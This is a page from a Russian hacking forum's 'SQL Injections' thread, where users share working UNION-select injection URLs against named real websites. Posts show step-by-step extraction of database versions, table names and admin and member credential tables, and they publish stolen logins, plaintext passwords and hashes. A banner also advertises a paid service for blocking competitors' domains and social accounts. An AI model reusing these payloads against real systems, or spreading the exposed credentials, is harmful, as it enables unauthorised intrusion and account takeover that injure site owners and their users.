Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 657 из 1242

657

Опции темы

Поиск в этой теме

Опции просмотра

#6561

07.09.2008, 22:01

[Dezzter]

Участник форума

Регистрация: 26.11.2007

Сообщений: 266

Провел на форуме:
3412198

Репутация: 341

Цитата:

http://www.tricitysra.org/display?help=Information&topic='+union+select+1,2, 3,4,5,6,7,8,9,0,1,concat( version(),char(58),database(),char(58),user()),3,4 ,5/*

5.0.45:tri:tri@localhost

#6562

08.09.2008, 09:00

~~N1K70~~

Banned

Регистрация: 02.01.2008

Сообщений: 195

Провел на форуме:
523549

Репутация: 301

Отправить сообщение для N1K70 с помощью ICQ

Proover.Com

Код:

http://proover.com/search_results.php?cid=-1/**/union/**/select/**/1,user(),3,4,5,6--

=\\\

#6563

08.09.2008, 09:24

USAkid

Участник форума

Регистрация: 17.06.2008

Сообщений: 214

Провел на форуме:
964766

Репутация: 228

Цитата:

Сообщение от N1K70

Proover.Com

Код:

http://proover.com/search_results.php?cid=-1/**/union/**/select/**/1,user(),3,4,5,6--

=\\\

Интересно по нему лазить, раскрутил бы дальше

Версия > 5 => узнаем пасс легко.

Код:

http://proover.com/search_results.php?cid=-1+union+select+1,column_name,3,4,5,6+from+information_schema.columns+where+table_name=0x457368705f6d656d62657273--

Тэкс, Es_pwd и admin_name то, что нас интересует.

Код:

http://proover.com/search_results.php?cid=-1+union+select+1,concat_ws(es_admin_name,0x3a,es_pwd)3,4,5,6+from+eshp_admin--

Получаем Admin:A

Полезли в мемберс:

Код:

http://proover.com/search_results.php?cid=-1+union+select+1,concat_ws(es_username,0x3a,es_password),3,4,5,6+from+eshp_members+limit+2,1--

И вот пошли логины с пассами.
Пассы открытые

#6564

08.09.2008, 13:16

Cennarios

Участник форума

Регистрация: 13.07.2008

Сообщений: 101

Провел на форуме:
346497

Репутация: 303

Отправить сообщение для Cennarios с помощью ICQ

http://www.scooter-center.ru/detail/?id=-1+union+select+concat(0x3a3a,login,0x3a3a,password ,0x3a3a),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22+from+cmf3_sc.bof_users+limit+0,1/*

login: wolf pass: 123
--------------------------------------------------

http://www.travelnetcuba.it/hotels.php?id_hotel=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(table_n ame,0x3a3a,table_schema),12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+ from+information_schema.tables+limit+37,1/*

login: lorenzo
pass: 883777
--------------------------------------------

http://www.ipiccolissimi.it/root/catalogo.php?cat=1&tipologia=1&idMacro=37&idMicro=-1+union+select+1,concat(0x3a3a,login,0x3a3a,passwo rd)+from+utenti+limit+0,1/*
login: ipiccolissimi
pass: natura06thamm04

---------------------------------------------

#6565

08.09.2008, 14:04

USAkid

Участник форума

Регистрация: 17.06.2008

Сообщений: 214

Провел на форуме:
964766

Репутация: 228

.us

Код:

http://www.turkuaz.us/content.php?magId=-25+union+select+1,2,3,4,concat_ws(version(),0x3a,user(),0x3a,database()),6,7--

version() - :4.1.22
user() - turkuaz-us@89.106.12.59
database() - turkuazus

#6566

08.09.2008, 14:27

USAkid

Участник форума

Регистрация: 17.06.2008

Сообщений: 214

Провел на форуме:
964766

Репутация: 228

http://laneuse.ci.minneapolis.mn.us

Код:

http://laneuse.ci.minneapolis.mn.us/closure.php?pn=1+union+select+concat_ws(version(),0x3a,user(),0x3a,database()),2,3,4,5--

version() - 5.0.58
user() - traffic7@localhost
database() - tmo

До пасса добраться удалось, он в открытом виде:

Код:

http://laneuse.ci.minneapolis.mn.us/closure.php?pn=1+union+select+concat_ws(login,0x3a,password),2,3,4,5+from+users+limit+0,1--

--------------------------------------------------------------------
Еще чуть-чуть (тож .us):
http://mobile.sugarcube.us

Код:

http://mobile.sugarcube.us/details.php?id=-1+union+select+1,concat_ws(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11--

version() - 4.0.27-max-log
user() - newvintage@64.202.163.213
database() - newvintage

Последний раз редактировалось USAkid; 08.09.2008 в 14:38..

#6567

08.09.2008, 14:56

USAkid

Участник форума

Регистрация: 17.06.2008

Сообщений: 214

Провел на форуме:
964766

Репутация: 228

И еще немного .us

http://www.ultrashine.us

Код:

http://www.ultrashine.us/product_item.php?cat=&item=-7+union+select+1,concat_ws(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14--

version() - 4.0.27-max-log
user() - dbo206430733@74.208.16.924.0.27
database() - db206430733

--------------------------------------------------------------------

http://www2.ci.poway.ca.us/

Код:

http://www2.ci.poway.ca.us/pcpa/pcpadetail.php?eventid=176+union+select+1,concat_ws(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13--

version() - 5.0.60-log
user() - powaycity@localhost
database() - powaycity

#6568

08.09.2008, 18:39

MirA

Новичок

Регистрация: 24.07.2008

Сообщений: 29

Провел на форуме:
109513

Репутация: 52

Отправить сообщение для MirA с помощью ICQ

http://www.uniprod.ru

алкошоп)

version() = 4.1.22
user() = uniprod@localhost
database() = wwwuniprodru

http://www.uniprod.ru/mods.php?name=shop&action=goodsinfo&id=-272+union+select+1,2,3,4,concat_ws(0x3a3a3a,versio n(),user(),database())/*

есть табличка fs_users с полями:
uname
passwd
uid
email

вот конечный запрос,пассы в md5, но в основном есть в он-лайн базах...

http://www.uniprod.ru/mods.php?name=shop&action=goodsinfo&id=-272+union+select+1,2,3,4,concat_ws(0x3a3a3a,uname, email,passwd)+from+fs_users+limit+0,1/*

#6569

09.09.2008, 04:11

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

Цитата:

Сообщение от USAkid

Наконец-то вернулся домой, отдохнул прекрасно. Тэкс, теперь за дело:

mobilgamez.ru

Код:

http://mobilgamez.ru/ctlg.php?xn=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(version(),0x3a,user(),0x3a,database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51--

version() - 5.0.22
user() - admin_mobilgamez@89.188.106.170
database() - admin_mobilgamez

Вывод производится в title.

Сервер:
nginx/0.6.31

Админка какая-то странная, по идее тут:
http://mobilgamez.ru/admin , ввел наугад логин/пароль admin/admin ... Подойти вроде подошло, но ошибку 500 показало... Вот так вотЪ

Данные по полям user,password из таблицы admin_packer.admin_users:
-------
kosty:*CAA6A6EB56FA8757200E1BA2FAD09CD01220317A
lena:*348D2F9427DAD0C3D0EDBE03182DA2FB9E4C5DBF

#6570

09.09.2008, 12:08

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

http://www.avtosreda.ru/new/meropr.php?id=-16+union+select+concat_ws(0x3a,id,user_name,user_p ass,user_mail,user_icq)+from+itaf_user+limit+0,1/*

Страница 657 из 1242

657

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход